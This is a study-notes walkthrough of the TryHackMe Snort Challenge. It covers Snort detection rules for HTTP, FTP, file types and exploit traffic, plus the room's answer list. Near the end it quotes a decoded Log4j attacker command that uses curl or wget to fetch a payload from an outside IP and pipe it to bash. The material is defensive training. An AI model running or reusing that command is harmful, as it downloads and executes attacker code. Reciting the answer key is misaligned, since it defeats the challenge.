We covered using Snort to analyze FTP and HTTP traffic by creating and configuring the appropriate rules. To apply what we learned, we analyzed given network captures using Snort to test the created rules and detect traffic patterns. This was part of TryHackMe Snort Challenge – The Basics.

Snort Study Notes

Introduction to Snort

SNORT is an open-source, rule-based Network Intrusion Detection and Prevention System (NIDS/NIPS). It was developed, and is still maintained, by Martin Roesch, open-source contributors, and the Cisco Talos team.

Capabilities of Snort

  • Live traffic analysis
  • Attack and probe detection
  • Packet logging
  • Protocol analysis
  • Real-time alerting
  • Modules & plugins
  • Pre-processors
  • Cross-platform support! (Linux & Windows)

Snort IDS Operating Modes

  • Sniffer Mode – Read IP packets and display them in the console.
  • Packet Logger Mode – Log all IP packets (inbound and outbound) that visit the network.
  • NIDS and NIPS Modes – Log/drop the packets that are deemed malicious according to the user-defined rules.

Snort Rules

Snort is an open-source Intrusion Detection System (IDS) and Intrusion Prevention System (IPS). The challenge involves creating Snort rules to detect HTTP and FTP traffic by analyzing provided PCAP files. Two methods are demonstrated: writing Snort rules to detect packets and running Snort in packet logger mode to capture and analyze packets without generating alerts.

HTTP Traffic Detection

The task requires creating rules to detect all TCP Port 80 (HTTP) traffic. Two rules are written: one for outbound traffic (from your network to external servers) and one for inbound traffic (from servers to your network). After writing the rules, Snort is run to analyze the PCAP file, and the number of detected packets (alerts) is extracted. The final result shows 164 detected packets.

The video explains how to open the generated alert file to review the detected packets, including details like source IP, destination IP, and port numbers.

Analyzing Specific Packets

The task also requires extracting information from specific packets (e.g., packet 65). Using Snort’s output, the video demonstrates how to analyze the captured traffic and identify key information like source IP addresses and destination IP addresses for specific packet numbers.

FTP Traffic Detection

The next task focuses on detecting FTP traffic on Port 21. Similar to the HTTP task, rules are created to detect FTP traffic in both outbound and inbound directions. After running Snort with these rules, the system detects 307 FTP packets, and further analysis is performed on the captured data.

The video explains how to review the alerts and extract the FTP service name from the captured packets by analyzing the log files.

Reviewing Logs and Alerts

The video also covers how to analyze log files generated by Snort, filtering for specific protocols (like FTP) and viewing the full packet dump to identify key information, including the FTP service name.
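Rules of the shape the HTTP and FTP tasks above call for, as an added example rather than the room's own rule file; it assumes plain any/any addresses (no $HOME_NET variables) and local sids in the 1000000+ range, which are assumptions, not values from the page.

```snort
# Added example, not the room's rule file. Local rules use sids >= 1000000 so they
# never collide with the community/Talos rulesets.

# TCP port 80 (HTTP): one rule per direction. Destination port 80 is traffic going
# to a web server; source port 80 is the server's replies.
alert tcp any any -> any 80 (msg:"HTTP traffic to port 80"; sid:1000001; rev:1;)
alert tcp any 80 -> any any (msg:"HTTP traffic from port 80"; sid:1000002; rev:1;)

# TCP port 21 (FTP control channel only; the data channel uses port 20 or a
# passive-mode port and is not caught by these rules), same pattern.
alert tcp any any -> any 21 (msg:"FTP traffic to port 21"; sid:1000003; rev:1;)
alert tcp any 21 -> any any (msg:"FTP traffic from port 21"; sid:1000004; rev:1;)

# Equivalent single rule: the <> operator matches either direction, so one rule
# can replace the two unidirectional ones above (kept commented out here so the
# pair and the bidirectional form are not both active at once).
# alert tcp any any <> any 21 (msg:"FTP traffic, either direction"; sid:1000005; rev:1;)
```

Run the rules file against the capture with the command structure the challenge uses (sudo snort -c local.rules -r mx-1.pcap -A console) and count the alert lines, or add -A full -l . to write the alert and log files that the packet-detail questions are answered from.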

Room Answers | Snort Challenge – The Basics

What is the number of detected packets?

Note: You must answer this question correctly before answering the rest of the questions in this task.

328

Investigate the log file.

What is the destination address of packet 63?

145.254.160.237

Investigate the log file.

What is the ACK number of packet 64?

0x38AFFFF3

Investigate the log file.

What is the SEQ number of packet 62?

0x38AFFFF3

Investigate the log file.

What is the TTL of packet 65?

128

Investigate the log file.

What is the source IP of packet 65?

145.254.160.237

Investigate the log file.

What is the source port of packet 65?

3372

Use the given pcap file.

Write rules to detect “all TCP port 21” traffic in the given pcap.

What is the number of detected packets?

614

Investigate the log file.

What is the FTP service name?

Microsoft FTP service

Clear the previous log and alarm files.

Deactivate/comment on the old rules.

Write a rule to detect failed FTP login attempts in the given pcap.

What is the number of detected packets?

41

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect successful FTP logins in the given pcap.

What is the number of detected packets?

1

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.

What is the number of detected packets?

42

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect failed FTP login attempts with “Administrator” username but a bad password or no password.

What is the number of detected packets?

7

Navigate to the task folder.

Use the given pcap file.

Write a rule to detect the PNG file in the given pcap.

Investigate the logs and identify the software name embedded in the packet.

Adobe Imagereadyq

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect the GIF file in the given pcap.

Investigate the logs and identify the image format embedded in the packet.

GIF89a

Navigate to the task folder.

Use the given pcap file.

Write a rule to detect the torrent metafile in the given pcap.

What is the number of detected packets?

2

Investigate the log/alarm files.

What is the name of the torrent application?

bittorrent

Investigate the log/alarm files.

What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

application/x-bittorrent

Investigate the log/alarm files.

What is the hostname of the torrent metafile?

tracker2.torrentbox.com
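One way to write the content-matching rules that the FTP login tasks, the PNG/GIF tasks and the torrent-metafile tasks above ask for, as an added example rather than the room's answer rules. The FTP reply codes are the standard RFC 959 codes; the sids and message strings are assumptions, and the packet counts you get depend on the capture.

```snort
# Added example, not the room's rule file. FTP login outcomes are visible in the
# server's reply codes on the control channel (port 21):
#   230 = user logged in, 530 = not logged in, 331 = user name OK, need password.
# The trailing space inside the quotes keeps "530 " from matching e.g. "1530".
alert tcp any 21 -> any any (msg:"FTP login failed (530)"; content:"530 "; sid:1000011; rev:1;)
alert tcp any 21 -> any any (msg:"FTP login successful (230)"; content:"230 "; sid:1000012; rev:1;)

# 331 only shows that the username was accepted; whether the password then
# succeeded or failed is in the server's next reply (230 or 530).
alert tcp any 21 -> any any (msg:"FTP valid username, password requested (331)"; content:"331 "; sid:1000013; rev:1;)

# Two content matches in one rule must both be present in the payload. Microsoft FTP
# echoes the username in the 331 reply, which is what makes this match work.
alert tcp any 21 -> any any (msg:"FTP password requested for Administrator"; content:"331 "; content:"Administrator"; sid:1000014; rev:1;)

# Files are matched on their magic bytes; |89| is a hex byte, the rest is ASCII.
alert tcp any any -> any any (msg:"PNG file in payload"; content:"|89|PNG"; sid:1000015; rev:1;)
alert tcp any any -> any any (msg:"GIF89a file in payload"; content:"GIF89a"; sid:1000016; rev:1;)

# Torrent metafiles are served with this MIME type in the HTTP Content-Type header.
alert tcp any any -> any any (msg:"torrent metafile (x-bittorrent)"; content:"application/x-bittorrent"; nocase; sid:1000017; rev:1;)
```

After a rule fires, the software name, image format and tracker hostname asked for above are read from the logged packet payloads (snort -r on the log file, or -A full output), not from the alert line itself.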

In this section, you need to fix the syntax errors in the given rule files.

You can test each ruleset with the following command structure:

sudo snort -c local-X.rules -r mx-1.pcap -A console

Fix the syntax error in local-1.rules file and make it work smoothly.

What is the number of the detected packets?

16

Fix the syntax error in local-2.rules file and make it work smoothly.

What is the number of the detected packets?

68

Fix the syntax error in local-3.rules file and make it work smoothly.

What is the number of the detected packets?

87

Fix the syntax error in local-4.rules file and make it work smoothly.

What is the number of the detected packets?

90

Fix the syntax error in local-5.rules file and make it work smoothly.

What is the number of the detected packets?

155

Fix the logical error in local-6.rules file and make it work smoothly to create alerts.

What is the number of the detected packets?

2

Fix the logical error in local-7.rules file and make it work smoothly to create alerts.

What is the name of the required option:

msg

Navigate to the task folder.

Use the given pcap file.

Use the given rule file (local.rules) to investigate the MS17-010 exploitation.

What is the number of detected packets?

25154

Clear the previous log and alarm files.

Use local-1.rules empty file to write a new rule to detect payloads containing the “\IPC$” keyword.

What is the number of detected packets?

12

Investigate the log/alarm files.

What is the requested path?

\192.168.116.138\IPC$

What is the CVSS v2 score of the MS17-010 vulnerability?

9.3

Use the given pcap file.

Use the given rule file (local.rules) to investigate the log4j exploitation.

What is the number of detected packets?

26

Investigate the log/alarm files.

How many rules were triggered?

4

Investigate the log/alarm files.

What are the first six digits of the triggered rule sids?

210037

Clear the previous log and alarm files.

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes.

What is the number of detected packets?

41
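The “\IPC$” keyword rule and the payload-size rule asked for above, as added examples rather than the room's rule files. The hex escape for the backslash, the sids and the assumption that the share path appears as plain ASCII in the payload are mine, not from the page.

```snort
# Added example, not the room's rule file.
# The backslash is a special character in a content match, so it is written as the
# hex byte |5C| (writing it as \\ is the other accepted form). "$" needs no escaping.
# Assumption: the share path is carried as plain ASCII; if the protocol dialect sends
# it as UTF-16LE, every character is followed by a 00 byte and the hex pattern
# would have to be written with those interleaved bytes instead.
alert tcp any any -> any any (msg:"IPC$ share path in payload"; content:"|5C|IPC$"; sid:1000021; rev:1;)

# dsize tests the payload length only (not the frame size). Whether the <> range is
# inclusive or exclusive of its endpoints has differed between Snort versions, so
# check the manual for the version you run before relying on an exact boundary.
alert tcp any any -> any any (msg:"payload between 770 and 855 bytes"; dsize:770<>855; sid:1000022; rev:1;)
```

The encoding used in the matched payload and the IP ID of that packet are then read from the logged packet, as in the earlier tasks.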

Investigate the log/alarm files.

What is the name of the used encoding algorithm?

base64

Investigate the log/alarm files.

What is the IP ID of the corresponding packet?

62808

Investigate the log/alarm files.

Decode the encoded command.

What is the attacker’s command?

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

What is the CVSS v2 score of the Log4j vulnerability?

9.3

Video Walkthrough | TryHackMe Snort Challenge – The Basics

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.